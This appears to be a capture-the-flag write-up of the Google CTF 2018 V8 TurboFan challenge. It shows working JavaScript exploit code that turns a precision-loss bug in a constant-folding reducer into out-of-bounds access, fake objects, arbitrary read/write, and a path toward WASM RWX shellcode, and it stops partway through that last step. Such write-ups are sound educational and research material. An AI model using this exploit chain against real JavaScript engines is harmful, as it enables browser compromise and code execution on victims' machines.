The DuplicateAdditionReducer challenge The DuplicateAdditionReducer written by Stephen Röttger for Google CTF 2018 is a nice TurboFan challenge that adds a new reducer optimizing cases like x + 1 + 1. Understanding the reduction Let’s read the relevant part of the code. Reduction DuplicateAdditionReducer::Reduce(Node* node) { switch (node->opcode()) { case IrOpcode::kNumberAdd: return ReduceAddition(node); default: return NoChange(); } } Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) { DCHECK_EQ(node->op()->ControlInputCount(), 0); DCHECK_EQ(node->op()->EffectInputCount(), 0); DCHECK_EQ(node->op()->ValueInputCount(), 2); Node* left = NodeProperties::GetValueInput(node, 0); if (left->opcode() != node->opcode()) { return NoChange(); // [1] } Node* right = NodeProperties::GetValueInput(node, 1); if (right->opcode() != IrOpcode::kNumberConstant) { return NoChange(); // [2] } Node* parent_left = NodeProperties::GetValueInput(left, 0); Node* parent_right = NodeProperties::GetValueInput(left, 1); if (parent_right->opcode() != IrOpcode::kNumberConstant) { return NoChange(); // [3] } double const1 = OpParameter<double>(right->op()); double const2 = OpParameter<double>(parent_right->op()); Node* new_const = graph()->NewNode(common()->NumberConstant(const1+const2)); NodeProperties::ReplaceValueInput(node, parent_left, 0); NodeProperties::ReplaceValueInput(node, new_const, 1); return Changed(node); // [4] } Basically that means we've got 4 different code paths (read the code comments) when reducing a NumberAdd node. Only one of them leads to a node change. Let's draw a schema representing all of those cases. Nodes in red indicate that a condition is not satisfied, leading to a return NoChange. The case [4] takes both NumberConstants' double values and adds them together. It creates a new NumberConstant node whose value is the result of this addition. 
The node's right input will become the newly created NumberConstant while the left input will be replaced by the left parent's left input. Understanding the bug Precision loss with IEEE-754 doubles V8 represents numbers using IEEE-754 doubles. Their 52-bit mantissa, plus an implicit leading bit, gives 53 bits of integer precision. Therefore the maximum safe integer is pow(2,53)-1 which is 9007199254740991. Numbers above this value can't all be represented. As such, there will be precision loss when computing with values greater than that. A quick experiment in JavaScript demonstrates this problem and the strange behaviors it leads to. d8> var x = Number.MAX_SAFE_INTEGER + 1 undefined d8> x 9007199254740992 d8> x + 1 9007199254740992 d8> 9007199254740993 == 9007199254740992 true d8> x + 2 9007199254740994 d8> x + 3 9007199254740996 d8> x + 4 9007199254740996 d8> x + 5 9007199254740996 d8> x + 6 9007199254740998 Let's try to better understand this. 64-bit IEEE-754 doubles are represented using a 1-bit sign, 11-bit exponent and a 52-bit mantissa. When using the normalized form (the exponent is non null), the value is computed with the following formula. value = (-1)^sign * 2^(exponent - bias) * fraction bias = 1023 (for 64-bit doubles) fraction = 1 + bit51*2^-1 + bit50*2^-2 + ... + bit0*2^-52 (the leading 1 bit is implicit) So let's go through a few computations ourselves. d8> %DumpObjects(Number.MAX_SAFE_INTEGER, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0ddd0 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0ddd8 0x433fffffffffffff d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 1, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0aec0 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0aec8 0x4340000000000000 d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 2, 10) ----- [ HEAP_NUMBER_TYPE : 0x10 ] ----- 0x00000b8fffc0de88 0x00001f5c50100559 MAP_TYPE 0x00000b8fffc0de90 0x4340000000000001 For each number, we'll have the following computation. You can try the computations using links 1, 2 and 3. 
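These computations can also be replayed in JavaScript itself. The sketch below (helper names are ours) reads the raw bit pattern of a double through a BigUint64Array view and recomputes its value from the sign, exponent and mantissa fields:

```javascript
// Sketch: decode the IEEE-754 fields of a (normalized) double and
// recompute its value from the formula above. A Float64Array and a
// BigUint64Array share the same ArrayBuffer, so writing a double and
// reading an integer reinterprets the raw bits.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

function decode(x) {
  f64[0] = x;
  const bits = u64[0];
  const sign = Number(bits >> 63n);
  const exponent = Number((bits >> 52n) & 0x7ffn);
  const mantissa = bits & 0xfffffffffffffn; // low 52 bits
  // normalized form only: implicit leading 1, bias 1023
  const fraction = 1 + Number(mantissa) / 2 ** 52;
  const value = (sign ? -1 : 1) * 2 ** (exponent - 1023) * fraction;
  return { sign, exponent, mantissa, value };
}

const d = decode(Number.MAX_SAFE_INTEGER); // raw bits: 0x433fffffffffffff
console.log(d.exponent.toString(16)); // "433"
console.log(d.value === Number.MAX_SAFE_INTEGER); // true
```

Decoding Number.MAX_SAFE_INTEGER gives the 0x433 exponent and all-ones mantissa seen in the %DumpObjects output above.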
As you see, the precision loss is inherent to the way IEEE-754 computations are made. Even though we incremented the binary value, the corresponding real number was not incremented accordingly. It is impossible to represent the value 9007199254740993 using IEEE-754 doubles. That's why it is not possible to increment 9007199254740992. You can however add 2 to 9007199254740992 because the result can be represented! That means that x += 1; x += 1; may not be equivalent to x += 2. And that might be an interesting behaviour to exploit. d8> var x = Number.MAX_SAFE_INTEGER + 1 9007199254740992 d8> x + 1 + 1 9007199254740992 d8> x + 2 9007199254740994 Therefore, those two graphs are not equivalent. Furthermore, the reducer does not update the type of the changed node. That's why it is going to be 'incorrectly' typed with the old Range(9007199254740992,9007199254740992), from the previous Typer phase, instead of Range(9007199254740994,9007199254740994) (even though, really, the problem is that we cannot take for granted that there is no precision loss while computing m+n, and therefore x += n; x += n; may not be equivalent to x += (n + n)). There is going to be a mismatch between the addition result 9007199254740994 and the range type with maximum value of 9007199254740992. What if we can use this buggy range analysis to reduce a CheckBounds node during the simplified lowering phase in a way that removes it? It is actually possible to trick the CheckBounds simplified lowering visitor into comparing an incorrect index Range to the length so that it believes that the index is in bounds when in reality it is not, thus removing what seems to be a useless bounds check. Let's check this by having yet another look at the sea of nodes! First consider the following code. let opt_me = (x) => { let arr = new Array(1.1,1.2,1.3,1.4); arr2 = new Array(42.1,42.0,42.0); let y = (x == "foo") ? 
4503599627370495 : 4503599627370493; let z = 2 + y + y ; // maximum value : 2 + 4503599627370495 * 2 = 9007199254740992 z = z + 1 + 1; // 9007199254740992 + 1 + 1 = 9007199254740992 + 1 = 9007199254740992 // replaced by 9007199254740992+2=9007199254740994 because of the incorrect reduction z = z - (4503599627370495*2); // max = 2 vs actual max = 4 return arr[z]; } opt_me(""); %OptimizeFunctionOnNextCall(opt_me); let res = opt_me("foo"); print(res); We do get a graph that looks exactly like the problematic drawing we showed before. Instead of getting two NumberAdd(x,1), we get only one with NumberAdd(x,2), which is not equivalent. The maximum value of z will be the following : d8> var x = 9007199254740992 d8> x = x + 2 // because of the buggy reducer! 9007199254740994 d8> x = x - (4503599627370495*2) 4 However, the index range used when visiting CheckBounds during simplified lowering will be computed as follows : d8> var x = 9007199254740992 d8> x = x + 1 9007199254740992 d8> x = x + 1 9007199254740992 d8> x = x - (4503599627370495*2) 2 Confirm that by looking at the graph. The index type used by CheckBounds is Range(0,2) (but in reality, its value can be up to 4) whereas the length type is Range(4,4). Therefore, the index looks to be always in bounds, making the CheckBounds disappear. In this case, we can load/store 8 or 16 bytes further (length is 4, we read at index 4. You could also have an array of length 3 and read at index 3 or 4.). Actually, if we execute the script, we get some OOB access and leak memory! $ d8 trigger.js --allow-natives-syntax 3.0046854007112e-310 Exploitation Now that we understand the bug, we may want to improve our primitive. For instance, it would be interesting to get the ability to read and write more memory. Improving the primitive One thing to try is to find a value such that the difference between x + n + n and x + m (with m = n + n and x = Number.MAX_SAFE_INTEGER + 1) is big enough. 
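Any candidate pair of constants can be evaluated in plain JavaScript, no d8 required, by comparing the chained additions against the folded constant a buggy reducer would produce. A small sketch (the delta helper is ours):

```javascript
// Sketch: compare x + n1 + n2 (two separate IEEE-754 roundings, what the
// original code computes) with x + (n1 + n2) (the single folded constant
// a buggy reducer would produce). x starts at 2^53, where doubles stop
// being able to represent every integer.
const x = Number.MAX_SAFE_INTEGER + 1; // 9007199254740992
const delta = (n1, n2) => (x + (n1 + n2)) - (x + n1 + n2);

console.log(delta(1, 1)); // 2, the difference exploited by the trigger
console.log(delta(7199254740989, 9007199254740966)); // 4, a bigger delta
```

The bigger the delta, the further out of bounds the resulting index can be pushed.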
For instance, replacing x + 007199254740989 + 9007199254740966 by x + 9014398509481956 gives us an out of bounds by 4 and not 2 anymore. d8> sum = 007199254740989 + 9007199254740966 9014398509481956 d8> a = x + sum 18021597764222948 d8> b = x + 007199254740989 + 9007199254740966 18021597764222944 d8> a - b 4 And what if we do multiple additions to get even more precision loss? Like x + n + n + n + n being transformed into x + 4n? d8> var sum = 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966 undefined d8> var x = Number.MAX_SAFE_INTEGER + 1 undefined d8> x + sum 27035996273704904 d8> x + 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966 27035996273704896 d8> 27035996273704904 - 27035996273704896 8 Now we get a delta of 8. Or maybe we could amplify the precision loss even more using other operators? d8> var x = Number.MAX_SAFE_INTEGER + 1 undefined d8> 10 * (x + 1 + 1) 90071992547409920 d8> 10 * (x + 2) 90071992547409940 That gives us a delta of 20 because precision_loss * 10 = 20 and the precision loss is 2. Step 0 : Corrupting a FixedDoubleArray First, we want to observe the memory layout to know what we are leaking and what we want to overwrite exactly. For that, I simply use my custom %DumpObjects v8 runtime function. Also, I use an ArrayBuffer with two views: one Float64Array and one BigUint64Array to easily convert between 64-bit floats and 64-bit integers. let ab = new ArrayBuffer(8); let fv = new Float64Array(ab); let dv = new BigUint64Array(ab); let f2i = (f) => { fv[0] = f; return dv[0]; } let hexprintablei = (i) => { return (i).toString(16).padStart(16,"0"); } let debug = (x,z, leak) => { print("oob index is " + z); print("length is " + x.length); print("leaked 0x" + hexprintablei(f2i(leak))); %DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements }; let opt_me = (x) => { let arr = new Array(1.1,1.2,1.3); arr2 = new Array(42.1,42.0,42.0); let y = (x == "foo") ? 
4503599627370495 : 4503599627370493; let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992 z = z + 1 + 1; z = z - (4503599627370495*2); let leak = arr[z]; if (x == "foo") debug(arr,z, leak); return leak; } opt_me(""); %OptimizeFunctionOnNextCall(opt_me); let res = opt_me("foo"); That gives the following results : oob index is 4 length is 3 leaked 0x0000000300000000 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x00002e5fddf8b6a8 0x00002af7fe681451 MAP_TYPE 0x00002e5fddf8b6b0 0x0000000300000000 0x00002e5fddf8b6b8 0x3ff199999999999a arr[0] 0x00002e5fddf8b6c0 0x3ff3333333333333 arr[1] 0x00002e5fddf8b6c8 0x3ff4cccccccccccd arr[2] ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x00002e5fddf8b6d0 0x00002af7fe681451 MAP_TYPE // also arr[3] 0x00002e5fddf8b6d8 0x0000000300000000 arr[4] with OOB index! 0x00002e5fddf8b6e0 0x40450ccccccccccd arr2[0] == 42.1 0x00002e5fddf8b6e8 0x4045000000000000 arr2[1] == 42.0 0x00002e5fddf8b6f0 0x4045000000000000 ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x00002e5fddf8b6f8 0x0000290fb3502cf1 MAP_TYPE arr2 JSArray 0x00002e5fddf8b700 0x00002af7fe680c19 FIXED_ARRAY_TYPE [as] 0x00002e5fddf8b708 0x00002e5fddf8b6d1 FIXED_DOUBLE_ARRAY_TYPE Obviously, the FixedDoubleArrays of arr and arr2 are contiguous. At arr[3] we've got arr2's map and at arr[4] we've got arr2's elements length (encoded as an Smi, which is 32 bits even on 64-bit platforms). 
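The leaked value 0x0000000300000000 is indeed the length 3 encoded as a Smi: on these x64 builds, the 32-bit payload lives in the upper half of the 64-bit word. A quick sketch of this encoding (helper names are ours):

```javascript
// Sketch: Smi encoding on x64 (no pointer compression): the 32-bit
// integer payload is stored in the upper 32 bits of the 64-bit word,
// so the raw value 0x0000000300000000 decodes to the length 3.
const smiToInt = (bits) => Number(BigInt.asIntN(64, bits) >> 32n);
const intToSmi = (v) => BigInt(v) << 32n;

console.log(smiToInt(0x0000000300000000n)); // 3, the leaked elements length
console.log(intToSmi(0x64).toString(16));   // "6400000000" -> a length of 0x64
```

The second helper is exactly the value we will want to write when corrupting a length field with a new, larger value.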
Please note that we changed the trigger code a little bit : < let arr = new Array(1.1,1.2,1.3,1.4); --- > let arr = new Array(1.1,1.2,1.3); Otherwise we would read/write the map instead, as the following dump demonstrates : oob index is 4 length is 4 leaked 0x0000057520401451 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x30 ] ----- 0x0000108bcf50b6c0 0x0000057520401451 MAP_TYPE 0x0000108bcf50b6c8 0x0000000400000000 0x0000108bcf50b6d0 0x3ff199999999999a arr[0] == 1.1 0x0000108bcf50b6d8 0x3ff3333333333333 arr[1] 0x0000108bcf50b6e0 0x3ff4cccccccccccd arr[2] 0x0000108bcf50b6e8 0x3ff6666666666666 arr[3] == 1.4 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x0000108bcf50b6f0 0x0000057520401451 MAP_TYPE arr[4] with OOB index! 0x0000108bcf50b6f8 0x0000000300000000 0x0000108bcf50b700 0x40450ccccccccccd 0x0000108bcf50b708 0x4045000000000000 0x0000108bcf50b710 0x4045000000000000 ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x0000108bcf50b718 0x00001dd08d482cf1 MAP_TYPE 0x0000108bcf50b720 0x0000057520400c19 FIXED_ARRAY_TYPE Step 1 : Corrupting a JSArray and leaking an ArrayBuffer's backing store The problem with step 0 is that we merely overwrite the FixedDoubleArray's length ... which is pretty useless: it is not the field actually controlling the JSArray’s length the way we expect; it just gives information about the memory allocated for the fixed array. Actually, the only length we want to corrupt is the one from the JSArray. Indeed, the length of the JSArray is not necessarily the same as the length of the underlying FixedArray (or FixedDoubleArray). Let's quickly check that. 
d8> let a = new Array(0); undefined d8> a.push(1); 1 d8> %DebugPrint(a) DebugPrint: 0xd893a90aed1: [JSArray] - map: 0x18bbbe002ca1 <Map(HOLEY_SMI_ELEMENTS)> [FastProperties] - prototype: 0x1cf26798fdb1 <JSArray[0]> - elements: 0x0d893a90d1c9 <FixedArray[17]> [HOLEY_SMI_ELEMENTS] - length: 1 - properties: 0x367210500c19 <FixedArray[0]> { #length: 0x0091daa801a1 <AccessorInfo> (const accessor descriptor) } - elements: 0x0d893a90d1c9 <FixedArray[17]> { 0: 1 1-16: 0x3672105005a9 <the_hole> } In this case, even though the length of the JSArray is 1, the underlying FixedArray has a length of 17, which is just fine! But that is something that you want to keep in mind. If you want to get an OOB R/W primitive, it's the JSArray's length that you want to overwrite. Also if you were to have an out-of-bounds access on such an array, you may want to check that the size of the underlying fixed array is not too big. So, let's tweak our code a bit to target the JSArray's length! If you look at the memory dump, you may think that having the allocated JSArray before the FixedDoubleArray might be convenient, right? Right now the layout is: FIXED_DOUBLE_ARRAY_TYPE FIXED_DOUBLE_ARRAY_TYPE JS_ARRAY_TYPE Let's simply change the way we are allocating the second array. 
23c23 < arr2 = new Array(42.1,42.0,42.0); --- > arr2 = Array.of(42.1,42.0,42.0); Now we have the following layout FIXED_DOUBLE_ARRAY_TYPE JS_ARRAY_TYPE FIXED_DOUBLE_ARRAY_TYPE oob index is 4 length is 3 leaked 0x000009d6e6600c19 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x000032adcd10b6b8 0x000009d6e6601451 MAP_TYPE 0x000032adcd10b6c0 0x0000000300000000 0x000032adcd10b6c8 0x3ff199999999999a arr[0] 0x000032adcd10b6d0 0x3ff3333333333333 arr[1] 0x000032adcd10b6d8 0x3ff4cccccccccccd arr[2] ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x000032adcd10b6e0 0x000009b41ff82d41 MAP_TYPE map arr[3] 0x000032adcd10b6e8 0x000009d6e6600c19 FIXED_ARRAY_TYPE properties arr[4] 0x000032adcd10b6f0 0x000032adcd10b729 FIXED_DOUBLE_ARRAY_TYPE elements 0x000032adcd10b6f8 0x0000000300000000 Cool, now we are able to access the JSArray instead of the FixedDoubleArray. However, we're accessing its properties field. Thanks to the precision loss when transforming +1+1 into +2 we get a difference of 2 between the computations. If we get a difference of 4, we'll be at the right offset. Transforming +1+1+1 into +3 will give us this! d8> x + 1 + 1 + 1 9007199254740992 d8> x + 3 9007199254740996 26c26 < z = z + 1 + 1; --- > z = z + 1 + 1 + 1; Now we are able to read/write the JSArray's length. oob index is 6 length is 3 leaked 0x0000000300000000 ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x000004144950b6e0 0x00001b7451b01451 MAP_TYPE 0x000004144950b6e8 0x0000000300000000 0x000004144950b6f0 0x3ff199999999999a // arr[0] 0x000004144950b6f8 0x3ff3333333333333 0x000004144950b700 0x3ff4cccccccccccd ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x000004144950b708 0x0000285651602d41 MAP_TYPE 0x000004144950b710 0x00001b7451b00c19 FIXED_ARRAY_TYPE 0x000004144950b718 0x000004144950b751 FIXED_DOUBLE_ARRAY_TYPE 0x000004144950b720 0x0000000300000000 // arr[6] Now to leak the ArrayBuffer's data, it's very easy. Just allocate it right after the second JSArray. 
let arr = new Array(MAGIC,MAGIC,MAGIC); arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays ab = new ArrayBuffer(AB_LENGTH); This way, we get the following memory layout : ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x00003a4d7608bb48 0x000023fe25c01451 MAP_TYPE 0x00003a4d7608bb50 0x0000000300000000 0x00003a4d7608bb58 0x3ff199999999999a arr[0] 0x00003a4d7608bb60 0x3ff199999999999a 0x00003a4d7608bb68 0x3ff199999999999a ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x00003a4d7608bb70 0x000034dc44482d41 MAP_TYPE 0x00003a4d7608bb78 0x000023fe25c00c19 FIXED_ARRAY_TYPE 0x00003a4d7608bb80 0x00003a4d7608bba9 FIXED_DOUBLE_ARRAY_TYPE 0x00003a4d7608bb88 0x0000006400000000 ----- [ FIXED_ARRAY_TYPE : 0x18 ] ----- 0x00003a4d7608bb90 0x000023fe25c007a9 MAP_TYPE 0x00003a4d7608bb98 0x0000000100000000 0x00003a4d7608bba0 0x000023fe25c005a9 ODDBALL_TYPE ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] ----- 0x00003a4d7608bba8 0x000023fe25c01451 MAP_TYPE 0x00003a4d7608bbb0 0x0000000100000000 0x00003a4d7608bbb8 0x3ff3333333333333 arr2[0] ----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] ----- 0x00003a4d7608bbc0 0x000034dc444821b1 MAP_TYPE 0x00003a4d7608bbc8 0x000023fe25c00c19 FIXED_ARRAY_TYPE 0x00003a4d7608bbd0 0x000023fe25c00c19 FIXED_ARRAY_TYPE 0x00003a4d7608bbd8 0x0000000000000100 0x00003a4d7608bbe0 0x0000556b8fdaea00 ab's backing_store pointer! 0x00003a4d7608bbe8 0x0000000000000002 0x00003a4d7608bbf0 0x0000000000000000 0x00003a4d7608bbf8 0x0000000000000000 We can simply use the corrupted JSArray (arr2) to read the ArrayBuffer (ab). This will be useful later because memory pointed to by the backing_store is fully controlled by us, as we can put arbitrary data in it, through a data view (like a Uint32Array). Now that we know a pointer to some fully controlled content, let's go to step 2! Step 2 : Getting a fake object Arrays of PACKED_ELEMENTS can contain tagged pointers to JavaScript objects. 
For those unfamiliar with v8, the elements kind of a JSArray in v8 gives information about the type of elements it is storing. Read this if you want to know more about elements kinds. d8> var objects = new Array(new Object()) d8> %DebugPrint(objects) DebugPrint: 0xd79e750aee9: [JSArray] - elements: 0x0d79e750af19 <FixedArray[1]> { 0: 0x0d79e750aeb1 <Object map = 0x19c550d80451> } 0x19c550d82d91: [Map] - elements kind: PACKED_ELEMENTS Therefore if you can corrupt the content of an array of PACKED_ELEMENTS, you can put in a pointer to a crafted object. This is basically the idea behind the fakeobj primitive. The idea is to simply put the address backing_store+1 in this array (the original pointer is not tagged, v8 expects pointers to JavaScript objects to be tagged). Let's first simply write the value 0x4141414141 in the controlled memory. Indeed, we know that the very first field of any object is a pointer to a map (long story short, the map is the object that describes the type of the object. Other engines call it a Shape or a Structure. If you want to know more, just read the previous post on SpiderMonkey or this blog post). Therefore, if v8 indeed considers our pointer as an object pointer, when trying to use it, we should expect a crash when dereferencing the map. Achieving this is as easy as allocating an array with an object pointer, looking for the index to the object pointer, and replacing it by the (tagged) pointer to the previously leaked backing_store. let arr = new Array(MAGIC,MAGIC,MAGIC); arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays evil_ab = new ArrayBuffer(AB_LENGTH); packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI); Quickly check the memory layout. 
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] ----- 0x0000220f2ec82410 0x0000353622a01451 MAP_TYPE 0x0000220f2ec82418 0x0000000300000000 0x0000220f2ec82420 0x3ff199999999999a 0x0000220f2ec82428 0x3ff199999999999a 0x0000220f2ec82430 0x3ff199999999999a ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x0000220f2ec82438 0x0000261a44682d41 MAP_TYPE 0x0000220f2ec82440 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec82448 0x0000220f2ec82471 FIXED_DOUBLE_ARRAY_TYPE 0x0000220f2ec82450 0x0000006400000000 ----- [ FIXED_ARRAY_TYPE : 0x18 ] ----- 0x0000220f2ec82458 0x0000353622a007a9 MAP_TYPE 0x0000220f2ec82460 0x0000000100000000 0x0000220f2ec82468 0x0000353622a005a9 ODDBALL_TYPE ----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] ----- 0x0000220f2ec82470 0x0000353622a01451 MAP_TYPE 0x0000220f2ec82478 0x0000000100000000 0x0000220f2ec82480 0x3ff3333333333333 ----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] ----- 0x0000220f2ec82488 0x0000261a446821b1 MAP_TYPE 0x0000220f2ec82490 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec82498 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec824a0 0x0000000000000100 0x0000220f2ec824a8 0x00005599e4b21f40 0x0000220f2ec824b0 0x0000000000000002 0x0000220f2ec824b8 0x0000000000000000 0x0000220f2ec824c0 0x0000000000000000 ----- [ JS_ARRAY_TYPE : 0x20 ] ----- 0x0000220f2ec824c8 0x0000261a44682de1 MAP_TYPE 0x0000220f2ec824d0 0x0000353622a00c19 FIXED_ARRAY_TYPE 0x0000220f2ec824d8 0x0000220f2ec824e9 FIXED_ARRAY_TYPE 0x0000220f2ec824e0 0x0000000300000000 ----- [ FIXED_ARRAY_TYPE : 0x28 ] ----- 0x0000220f2ec824e8 0x0000353622a007a9 MAP_TYPE 0x0000220f2ec824f0 0x0000000300000000 0x0000220f2ec824f8 0x0000001300000000 // MARK 1 for memory scanning 0x0000220f2ec82500 0x00002f3befd86b81 JS_OBJECT_TYPE 0x0000220f2ec82508 0x0000003700000000 // MARK 2 for memory scanning Good, the FixedArray with the pointer to the Math object is located right after the ArrayBuffer. 
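Before the object pointer slot can be overwritten, the backing store address has to be tagged, since v8 expects heap object pointers to have their lowest bit set. A standalone sketch of the float/integer view trick and the tagging, mirroring the f2i/i2f/tagFloat helpers used in this post (the example address is taken from the dump above):

```javascript
// Sketch: reinterpret 64-bit values as doubles and back using two views
// over the same ArrayBuffer, then tag a pointer by adding 1 to its raw
// bits (setting the lowest bit), the way v8 expects heap object pointers
// to be tagged.
const buf = new ArrayBuffer(8);
const fview = new Float64Array(buf);
const iview = new BigUint64Array(buf);

const i2f = (i) => { iview[0] = i; return fview[0]; };
const f2i = (f) => { fview[0] = f; return iview[0]; };
const tagFloat = (f) => { fview[0] = f; iview[0] += 1n; return fview[0]; };

const backing_store = 0x5599e4b21f40n; // example address from the dump above
const tagged = tagFloat(i2f(backing_store));
console.log(f2i(tagged).toString(16)); // "5599e4b21f41" -> lowest bit set
```

Writing this tagged value as a double through the corrupted array of doubles is what makes v8 later interpret the backing store as a heap object.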
Observe that we put markers so as to scan memory instead of hardcoding offsets (which would be bad if we were to have a different memory layout for whatever reason). After locating the (oob) index to the object pointer, simply overwrite it and use it. let view = new BigUint64Array(evil_ab); view[0] = 0x414141414141n; // initialize the fake object with this value as a map pointer // ... arr2[index_to_object_pointer] = tagFloat(fbackingstore_ptr); packed_elements_array[1].x; // crash on 0x414141414141 because it is used as a map pointer Et voilà! Step 3 : Arbitrary read/write primitive Going from step 2 to step 3 is fairly easy. We just need our ArrayBuffer to contain data that look like an actual object. More specifically, we would like to craft an ArrayBuffer with a controlled backing_store pointer. You can also directly corrupt the existing ArrayBuffer to make it point to arbitrary memory. Your call! Don't forget to choose a length that is big enough for the data you plan to write (most likely, your shellcode). let view = new BigUint64Array(evil_ab); for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) { view[i] = f2i(arr2[ab_len_idx-3+i]); if (view[i] > 0x10000 && !(view[i] & 1n)) view[i] = 0x42424242n; // backing_store } // [...] arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // object pointer // [...] let rw_view = new Uint32Array(packed_elements_array[1]); rw_view[0] = 0x1337; // *0x42424242 = 0x1337 You should get a crash like this. 
$ d8 rw.js [+] corrupted JSArray's length [+] Found backingstore pointer : 0000555c593d9890 Received signal 11 SEGV_MAPERR 000042424242 ==== C stack trace =============================== [0x555c577b81a4] [0x7ffa0331a390] [0x555c5711b4ae] [0x555c5728c967] [0x555c572dc50f] [0x555c572dbea5] [0x555c572dbc55] [0x555c57431254] [0x555c572102fc] [0x555c57215f66] [0x555c576fadeb] [end of stack trace] Step 4 : Overwriting WASM RWX memory Now that we've got an arbitrary read/write primitive, we simply want to overwrite RWX memory, put a shellcode in it and call it. We'd rather not do any kind of ROP or JIT code reuse (0vercl0k did this for SpiderMonkey). V8 used to have the JIT'ed code of its JSFunction located in RWX memory. But this is not the case anymore. However, as Andrea Biondo showed on his blog, WASM is still using RWX memory. All you have to do is to instantiate a WASM module and, from one of its functions, simply find the WASM instance object that contains a pointer to the RWX memory in its field JumpTableStart. Plan of action: 1. Read the JSFunction's shared function info 2. Get the WASM exported function from the shared function info 3. Get the WASM instance from the exported function 4. Read the JumpTableStart field from the WASM instance As I mentioned above, I use a modified v8 engine for which I implemented a %DumpObjects feature that prints an annotated memory dump. It makes it very easy to understand how to get from a WASM JS function to the JumpTableStart pointer. I put some code here (use it at your own risk as it might crash sometimes). Also, depending on your current checkout, the code may not be compatible and you will probably need to tweak it. %DumpObjects will pinpoint the pointer like this: ----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] ----- [...] 0x00002fac7911ec20 0x0000087e7c50a000 JumpTableStart [RWX] So let's just find the RWX memory from a WASM function. sample_wasm.js can be found here. 
d8> load("sample_wasm.js") d8> %DumpObjects(global_test,10) ----- [ JS_FUNCTION_TYPE : 0x38 ] ----- 0x00002fac7911ed10 0x00001024ebc84191 MAP_TYPE 0x00002fac7911ed18 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed20 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed28 0x00002fac7911ecd9 SHARED_FUNCTION_INFO_TYPE 0x00002fac7911ed30 0x00002fac79101741 NATIVE_CONTEXT_TYPE 0x00002fac7911ed38 0x00000d1caca00691 FEEDBACK_CELL_TYPE 0x00002fac7911ed40 0x00002dc28a002001 CODE_TYPE ----- [ TRANSITION_ARRAY_TYPE : 0x30 ] ----- 0x00002fac7911ed48 0x00000cdfc0080b69 MAP_TYPE 0x00002fac7911ed50 0x0000000400000000 0x00002fac7911ed58 0x0000000000000000 function 1() { [native code] } d8> %DumpObjects(0x00002fac7911ecd9,11) ----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] ----- 0x00002fac7911ecd8 0x00000cdfc0080989 MAP_TYPE 0x00002fac7911ece0 0x00002fac7911ecb1 WASM_EXPORTED_FUNCTION_DATA_TYPE 0x00002fac7911ece8 0x00000cdfc00842c1 ONE_BYTE_INTERNALIZED_STRING_TYPE 0x00002fac7911ecf0 0x00000cdfc0082ad1 FEEDBACK_METADATA_TYPE 0x00002fac7911ecf8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ed00 0x000000000000004f 0x00002fac7911ed08 0x000000000000ff00 ----- [ JS_FUNCTION_TYPE : 0x38 ] ----- 0x00002fac7911ed10 0x00001024ebc84191 MAP_TYPE 0x00002fac7911ed18 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed20 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ed28 0x00002fac7911ecd9 SHARED_FUNCTION_INFO_TYPE 52417812098265 d8> %DumpObjects(0x00002fac7911ecb1,11) ----- [ WASM_EXPORTED_FUNCTION_DATA_TYPE : 0x28 ] ----- 0x00002fac7911ecb0 0x00000cdfc00857a9 MAP_TYPE 0x00002fac7911ecb8 0x00002dc28a002001 CODE_TYPE 0x00002fac7911ecc0 0x00002fac7911eb29 WASM_INSTANCE_TYPE 0x00002fac7911ecc8 0x0000000000000000 0x00002fac7911ecd0 0x0000000100000000 ----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] ----- 0x00002fac7911ecd8 0x00000cdfc0080989 MAP_TYPE 0x00002fac7911ece0 0x00002fac7911ecb1 WASM_EXPORTED_FUNCTION_DATA_TYPE 0x00002fac7911ece8 0x00000cdfc00842c1 ONE_BYTE_INTERNALIZED_STRING_TYPE 
